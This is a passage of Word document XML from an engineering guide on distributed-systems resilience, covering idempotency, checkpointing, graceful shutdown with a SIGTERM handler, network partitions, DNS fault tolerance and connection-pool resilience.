        <w:t>An idempotent operation produces the same result regardless of how many times it's executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF06782" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="27BFC41D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Naturally idempotent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D356DE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  SET x = 5           (doing it twice still gives x=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B83D52" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  DELETE FROM users WHERE id = 42  (deleting already-deleted row is no-op)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37152EE3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  PUT /users/42 {...} (full replace — same result regardless of repetition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B47880" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="207F9C85" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>NOT naturally idempotent (must be made safe):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA461DF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  x = x + 1          (doing it twice increments by 2!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B93C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  INSERT INTO orders  (doing it twice creates duplicate order!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41705AF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  POST /charges       (doing it twice charges twice!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E4EFC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5308D530" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Making non-idempotent operations idempotent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E782C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Idempotency keys (client-generated unique ID per operation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10900AAC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Conditional writes (UPDATE ... WHERE version = expected_version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F612D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Deduplication (check if operation already applied before executing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3CCDD0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Checkpointing and Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B0A85C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237CA49" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>For stateful systems (stream processing, batch jobs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51580578" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="38D6BA37" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: Long-running job processes 1 billion records. At record 750 million → crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B29FDB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Without checkpoint: restart from the beginning (waste hours of work).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB6028" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  With checkpoint: restart from last checkpoint (record 749 million).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94E94C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="27C6F1BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Checkpoint strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16348D25" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Every N records (or every T seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791781BB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    1. Save current processing state (position, partial results) to durable storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D8D31B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    2. Continue processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A276323" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141315A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  On crash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3161C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    1. Load last checkpoint from storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70811A82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    2. Resume from saved position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2D9CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    3. At most N records reprocessed (acceptable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA4897" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="7B4FAEC1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF02384" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Kafka consumer: commits offsets periodically (checkpoint = offset).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F4D1B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Flink: periodic snapshots of operator state (Chandy-Lamport algorithm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798DC997" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Spark: RDD lineage allows recomputation from last materialized checkpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B9C51" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.4 Graceful Shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5428B002" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F51BBD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: Pod/server being terminated (deploy, scale-down, node drain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135E16C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If terminated immediately → in-flight requests fail, connections drop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B15DC2E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="30AC926D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Graceful shutdown sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A1E89" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1. Receive SIGTERM (termination signal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F25DC9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  2. Stop accepting NEW connections/requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3704D710" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3. Drain: wait for in-flight requests to complete (with timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB61FE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  4. Close database connections, flush buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB3DAA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  5. Exit cleanly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E698E47" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="12842CBC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Kubernetes graceful termination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B4F432" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  terminationGracePeriodSeconds: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00092272" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B21B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  T=0:  SIGTERM sent to pod. Pod removed from Service endpoints (no new traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C85893" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  T=0–30: Pod finishes in-flight requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FAB56D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  T=30: SIGKILL if still running (force kill).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280EEF04" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF42CD1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356828E4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  signal.signal(signal.SIGTERM, shutdown_handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F579EF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53AE20" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  def shutdown_handler(sig, frame):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BD578" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      server.stop_accepting_connections()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40494040" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      server.drain(timeout=25)  # Wait for in-flight with buffer before SIGKILL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532A10E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      cleanup()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12596CB5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      sys.exit(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC0E56" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="0D25074D">
          <v:rect id="_x0000_i6351" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE9DA8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Network Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE31A82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Network Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267CDD52" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F436271" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>A network partition splits the cluster into groups that can't communicate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77243FBF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="44AE7327" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Before partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7384873E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  [A, B, C, D, E] — all can talk to each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E453AD4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="00EEA0AD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>During partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96AF2A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  [A, B, C] ←─── can't reach ───→ [D, E]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CABF70" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F278C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Each side thinks the other is dead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673CE313" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Each side may try to operate independently → SPLIT BRAIN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E0391B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="25FB752F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Handling partitions (CAP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB64A4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  CP (consistency): Minority partition refuses to serve (no split-brain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E0B5E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  AP (availability): Both partitions serve, reconcile later (eventual consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE4B75" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 DNS Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391B5BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F55B8A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>DNS failure → NOTHING works (can't resolve any hostname).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5951A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="58F5C35C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6754941C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Multiple DNS providers (Route53 + Cloudflare).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2E165" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Long TTLs for critical records (clients cache for hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DB6C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Local DNS caching (systemd-resolved, dnsmasq on each server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35690CDD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Hardcoded fallback IPs for absolutely critical services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F52C7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Service mesh (bypasses DNS for service-to-service calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB763A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Connection Pool Resilience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75C7F8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D853C93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Problem: Database/service becomes unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71B82F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Connection pool holds dead connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B3A263" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Every request waits for connection timeout → all threads consumed → cascading failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A699C76" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="00A4354F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369DD464" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Connection health check (test connection before using).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9DF1D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Connection TTL (rotate connections periodically — pick up new endpoints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A213839" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Pool size limits (bound the damage from dead connections).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776B0A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Separate pools per dependency (bulkhead — one dead service doesn't exhaust all connections).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F630D17" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
